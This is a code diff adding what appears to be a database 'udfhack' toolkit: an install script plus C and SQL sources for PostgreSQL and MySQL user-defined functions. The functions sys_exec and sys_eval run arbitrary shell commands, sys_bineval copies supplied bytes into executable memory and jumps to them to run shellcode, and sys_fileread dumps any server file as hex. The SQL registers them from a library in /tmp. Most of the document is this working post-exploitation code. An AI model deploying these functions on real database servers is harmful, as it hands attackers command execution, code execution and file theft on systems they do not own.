+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+# Lesser General Public License for more details.
+# 
+# You should have received a copy of the GNU Lesser General Public
+# License along with this library; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+
+# Adapt the following settings to your environment
+USER="postgres"
+PORT="5434"
+VERSION="8.4"
+#PORT="5433"
+#VERSION="8.3"
+#PORT="5432"
+#VERSION="8.2"
+
+echo "Compiling the PostgreSQL UDF"
+make ${VERSION}
+
+if test $? -ne 0; then
+	echo "ERROR: You need postgresql-server development software installed"
+	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
+
+	if test "${VERSION}" == "8.2"; then
+		echo "apt-get install postgresql-server-dev-8.2"
+	elif test "${VERSION}" == "8.3"; then
+		echo "apt-get install postgresql-server-dev-8.3"
+	elif test "${VERSION}" == "8.4"; then
+		echo "apt-get install postgresql-server-dev-8.4"
+	fi
+
+	exit 1
+else
+	echo "PostgreSQL UDF compiled successfully"
+fi
+
+echo -e "\nPlease provide your PostgreSQL 'postgres' user's password"
+
+psql -h 127.0.0.1 -p ${PORT} -U ${USER} -q template1 < lib_postgresqludf_sys.sql
+
+if test $? -ne 0; then
+	echo "ERROR: unable to install the UDF"
+	exit 1
+else
+	echo "PostgreSQL UDF installed successfully"
+fi
--- a/extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.c
+++ b/extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.c
@@ -0,0 +1,274 @@
+/* 
+	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
+	web: http://bernardodamele.blogspot.com/
+	email: bernardo.damele@gmail.com
+	
+	This library is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+#define _USE_32BIT_TIME_T
+#define DLLEXP __declspec(dllexport) 
+#define BUILDING_DLL 1
+#else
+#define DLLEXP
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#endif
+
+#include <postgres.h>
+#include <fmgr.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <ctype.h>
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#endif
+
+#ifdef PG_MODULE_MAGIC
+PG_MODULE_MAGIC;
+#endif
+
+PG_FUNCTION_INFO_V1(sys_exec);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	int32 argv0_size;
+	int32 result = 0;
+	char *command;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	command = (char *)malloc(argv0_size + 1);
+
+	memcpy(command, VARDATA(argv0), argv0_size);
+	command[argv0_size] = '\0';
+
+	/*
+	Only if you want to log
+	elog(NOTICE, "Command execution: %s", command);
+	*/
+
+	result = system(command);
+	free(command);
+
+	PG_FREE_IF_COPY(argv0, 0);
+	PG_RETURN_INT32(result);
+}
+
+PG_FUNCTION_INFO_V1(sys_eval);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	char *command;
+	char *result;
+	FILE *pipe;
+	char line[1024];
+	int32 outlen, linelen;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	command = (char *)malloc(argv0_size + 1);
+
+	memcpy(command, VARDATA(argv0), argv0_size);
+	command[argv0_size] = '\0';
+
+	/*
+	Only if you want to log
+	elog(NOTICE, "Command evaluated: %s", command);
+	*/
+
+	result = (char *)malloc(1);
+	outlen = 0;
+
+	pipe = popen(command, "r");
+
+	while (fgets(line, sizeof(line), pipe) != NULL) {
+		linelen = strlen(line);
+		result = (char *)realloc(result, outlen + linelen);
+		strncpy(result + outlen, line, linelen);
+		outlen = outlen + linelen;
+	}
+
+	pclose(pipe);
+
+	if (*result) {
+		result[outlen-1] = 0x00;
+	}
+
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+
+	PG_RETURN_POINTER(result_text);
+}
+
+PG_FUNCTION_INFO_V1(sys_bineval);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	int32 argv0_size;
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	len = (size_t)argv0_size;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	strncpy(code, VARDATA(argv0), len);
+
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		PG_RETURN_INT32(1);
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);		// align to page boundary
+
+		// mmap an rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
+
+		if (addr == MAP_FAILED)
+			PG_RETURN_INT32(1);
+
+		strncpy((char *)addr, VARDATA(argv0), len);
+
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	PG_RETURN_INT32(0);
+}
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+
+	}
+
+	return 0;
+}
+#endif
+
+#undef fopen
+
+PG_FUNCTION_INFO_V1(sys_fileread);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	int32 len;
+	int32 i, j;
+	char *filename;
+	char *result;
+	char *buffer;
+	char table[] = "0123456789ABCDEF";
+	FILE *file;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	filename = (char *)malloc(argv0_size + 1);
+
+	memcpy(filename, VARDATA(argv0), argv0_size);
+	filename[argv0_size] = '\0';
+	
+	file = fopen(filename, "rb");
+	if (!file)
+	{
+		PG_RETURN_NULL();
+	}
+	fseek(file, 0, SEEK_END);
+	len = ftell(file);
+	fseek(file, 0, SEEK_SET);
+
+	buffer=(char *)malloc(len + 1);
+	if (!buffer)
+	{
+		fclose(file);
+		PG_RETURN_NULL();
+	}
+
+	fread(buffer, len, 1, file);
+	fclose(file);
+
+	result = (char *)malloc(2*len + 1);
+	for (i=0, j=0; i<len; i++)
+	{
+		result[j++] = table[(buffer[i] >> 4) & 0x0f];
+		result[j++] = table[ buffer[i]	   & 0x0f];
+	}
+	result[j] = '\0';
+	
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+	
+	free(result);
+	free(buffer);
+	free(filename);
+
+	PG_RETURN_POINTER(result_text);
+}
--- a/extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.sql
+++ b/extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.sql
@@ -0,0 +1,25 @@
+/* 
+	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
+	web: http://bernardodamele.blogspot.com/
+	email: bernardo.damele@gmail.com
+	
+	This library is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_fileread' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
--- a/extra/udfhack/windows/README.txt
+++ b/extra/udfhack/windows/README.txt
@@ -0,0 +1,25 @@
+Before compiling, certain enviroment variables have to be set,
+depending on the project used. For project lib_mysqludf_sys variables
+PLATFORM_SDK_DIR and MYSQL_SERVER_DIR have to be set, while for project
+lib_postgresqludf_sys variables PLATFORM_SDK_DIR and
+POSTGRESQL_SERVER_DIR.
+
+Variables:
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		Directory where the Platform SDK is installed
+MYSQL_SERVER_DIR		Directory where the MySQL is installed
+POSTGRESQL_SERVER_DIR	Directory where the PostgreSQL is installed
+
+Procedure for setting environment variables:
+My Computer -> Properties -> Advanced -> Environment Variables
+User variables -> New
+
+Sample values:
+--------------------------------------------------------------------------
+Variable name			Variable value
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
+MYSQL_SERVER_DIR		C:\Program Files\MySQL\MySQL Server 5.1
+POSTGRESQL_SERVER_DIR	C:\Program Files\PostgreSQL\8.4
--- a/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys.sln
+++ b/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_mysqludf_sys", "lib_mysqludf_sys\lib_mysqludf_sys.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
--- a/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.c
+++ b/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.c
@@ -0,0 +1,551 @@
+/* 
+	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
+	Copyright (C) 2007  Roland Bouman 
+	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
+	web: http://www.mysqludf.org/
+	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
+	
+	This library is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+#define DLLEXP __declspec(dllexport) 
+#else
+#define DLLEXP
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#endif
+
+#ifdef STANDARD
+#include <string.h>
+#include <stdlib.h>
+#include <time.h>
+#ifdef __WIN__
+typedef unsigned __int64 ulonglong;
+typedef __int64 longlong;
+#else
+typedef unsigned long long ulonglong;
+typedef long long longlong;
+#endif /*__WIN__*/
+#else
+#include <my_global.h>
+#include <my_sys.h>
+#endif
+#include <mysql.h>
+#include <m_ctype.h>
+#include <m_string.h>
+#include <stdlib.h>
+
+#include <ctype.h>
+
+#ifdef HAVE_DLOPEN
+#ifdef	__cplusplus
+extern "C" {
+#endif
+
+#define LIBVERSION "lib_mysqludf_sys version 0.0.3"
+
+#ifdef __WIN__
+#define SETENV(name,value)		SetEnvironmentVariable(name,value);
+#else
+#define SETENV(name,value)		setenv(name,value,1);		
+#endif
+
+DLLEXP 
+my_bool lib_mysqludf_sys_info_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+);
+
+DLLEXP 
+void lib_mysqludf_sys_info_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+char* lib_mysqludf_sys_info(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+);
+
+/**
+ * sys_get
+ * 
+ * Gets the value of the specified environment variable.
+ */
+DLLEXP 
+my_bool sys_get_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+);
+
+DLLEXP 
+void sys_get_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+char* sys_get(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+);
+
+/**
+ * sys_set
+ * 
+ * Sets the value of the environment variables.
+ * This function accepts a set of name/value pairs
+ * which are then set as environment variables.
+ * Use sys_get to retrieve the value of such a variable 
+ */
+DLLEXP 
+my_bool sys_set_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+);
+
+DLLEXP 
+void sys_set_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+long long sys_set(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *is_null
+,	char *error
+);
+
+/**
+ * sys_exec
+ * 
+ * executes the argument commandstring and returns its exit status.
+ * Beware that this can be a security hazard.
+ */
+DLLEXP 
+my_bool sys_exec_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+);
+
+DLLEXP 
+void sys_exec_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+my_ulonglong sys_exec(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *is_null
+,	char *error
+);
+
+/**
+ * sys_eval
+ * 
+ * executes the argument commandstring and returns its standard output.
+ * Beware that this can be a security hazard.
+ */
+DLLEXP 
+my_bool sys_eval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+);
+
+DLLEXP 
+void sys_eval_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+char* sys_eval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+);
+
+/**
+ * sys_bineval
+ * 
+ * executes bynary opcodes.
+ * Beware that this can be a security hazard.
+ */
+DLLEXP 
+my_bool sys_bineval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+);
+
+DLLEXP 
+void sys_bineval_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+int sys_bineval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+);
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#endif
+
+
+#ifdef	__cplusplus
+}
+#endif
+
+/**
+ * lib_mysqludf_sys_info
+ */
+my_bool lib_mysqludf_sys_info_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+){
+	my_bool status;
+	if(args->arg_count!=0){
+		strcpy(
+			message
+		,	"No arguments allowed (udf: lib_mysqludf_sys_info)"
+		);
+		status = 1;
+	} else {
+		status = 0;
+	}
+	return status;
+}
+
+void lib_mysqludf_sys_info_deinit(
+	UDF_INIT *initid
+){
+}
+
+char* lib_mysqludf_sys_info(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+){
+	strcpy(result,LIBVERSION);
+	*length = strlen(LIBVERSION);
+	return result;
+}
+
+my_bool sys_get_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+){
+	if(args->arg_count==1
+	&&	args->arg_type[0]==STRING_RESULT){
+		initid->maybe_null = 1;
+		return 0;
+	} else {
+		strcpy(
+			message
+		,	"Expected exactly one string type parameter"
+		);		
+		return 1;
+	}
+}
+
+void sys_get_deinit(
+	UDF_INIT *initid
+){
+}
+
+char* sys_get(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+){
+	char* value = getenv(args->args[0]);
+	if(value == NULL){
+		*is_null = 1;
+	} else {
+		*length = strlen(value);
+	} 
+	return value;
+}
+
+my_bool sys_set_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+){
+	if(args->arg_count!=2){
+		strcpy(
+			message
+		,	"Expected exactly two arguments"
+		);		
+		return 1;
+	}
+	if(args->arg_type[0]!=STRING_RESULT){
+		strcpy(
+			message
+		,	"Expected string type for name parameter"
+		);		
+		return 1;
+	}
+	args->arg_type[1]=STRING_RESULT;
+	if((initid->ptr=malloc(
+		args->lengths[0]
+	+	1
+	+	args->lengths[1]
+	+	1
+	))==NULL){
+		strcpy(
+			message
+		,	"Could not allocate memory"
+		);		
+		return 1;
+	}	
+	return 0;
+}
+
+void sys_set_deinit(
+	UDF_INIT *initid
+){
+	if (initid->ptr!=NULL){
+		free(initid->ptr);
+	}
+}
+
+long long sys_set(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *is_null
+,	char *error
+){	
+	char *name = initid->ptr;
+	char *value = name + args->lengths[0] + 1; 
+	memcpy(
+		name
+	,	args->args[0]
+	,	args->lengths[0]
+	);
+	*(name + args->lengths[0]) = '\0';
+	memcpy(
+		value
+	,	args->args[1]
+	,	args->lengths[1]
+	);
+	*(value + args->lengths[1]) = '\0';
+	return SETENV(name,value);		
+}
+
+my_bool sys_exec_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+){
+	unsigned int i=0;
+	if(args->arg_count == 1
+	&& args->arg_type[i]==STRING_RESULT){
+		return 0;
+	} else {
+		strcpy(
+			message
+		,	"Expected exactly one string type parameter"
+		);		
+		return 1;
+	}
+}
+
+void sys_exec_deinit(
+	UDF_INIT *initid
+){
+}
+
+my_ulonglong sys_exec(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *is_null
+,	char *error
+){
+	return system(args->args[0]);
+}
+
+my_bool sys_eval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+){
+	unsigned int i=0;
+	if(args->arg_count == 1
+	&& args->arg_type[i]==STRING_RESULT){
+		return 0;
+	} else {
+		strcpy(
+			message
+		,	"Expected exactly one string type parameter"
+		);		
+		return 1;
+	}
+}
+
+void sys_eval_deinit(
+	UDF_INIT *initid
+){
+}
+
+char* sys_eval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+){
+	FILE *pipe;
+	char line[1024];
+	unsigned long outlen, linelen;
+
+	result = malloc(1);
+	outlen = 0;
+
+	pipe = popen(args->args[0], "r");
+
+	while (fgets(line, sizeof(line), pipe) != NULL) {
+		linelen = strlen(line);
+		result = realloc(result, outlen + linelen);
+		strncpy(result + outlen, line, linelen);
+		outlen = outlen + linelen;
+	}
+
+	pclose(pipe);
+
+	if (!(*result) || result == NULL) {
+		*is_null = 1;
+	} else {
+		result[outlen-1] = 0x00;
+		*length = strlen(result);
+	}
+
+	return result;
+}
+
+my_bool sys_bineval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+){
+	return 0;
+}
+
+void sys_bineval_deinit(
+	UDF_INIT *initid
+){
+	
+}
+
+int sys_bineval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+){
+	int32 argv0_size;
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	argv0_size = strlen(args->args[0]);
+	len = (size_t)argv0_size;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	strncpy(code, args->args[0], len);
+
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		return 1;
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);		// align to page boundary
+
+		// mmap an rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
+
+		if (addr == MAP_FAILED)
+			return 1;
+
+		strncpy((char *)addr, args->args[0], len);
+
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	return 0;
+}
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+
+	}
+
+	return 0;
+}
+#endif
+
+#endif /* HAVE_DLOPEN */
--- a/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.vcproj
+++ b/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.vcproj
@@ -0,0 +1,192 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="lib_mysqludf_sys"
+	ProjectGUID="{4D362A3E-CA53-444C-B1C8-C49641823875}"
+	RootNamespace="lib_mysqludf_sys"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
+				PreprocessorDefinitions="HAVE_DLOPEN"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
+				PreprocessorDefinitions="HAVE_DLOPEN"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib"
+				GenerateDebugInformation="false"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\lib_mysqludf_sys.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
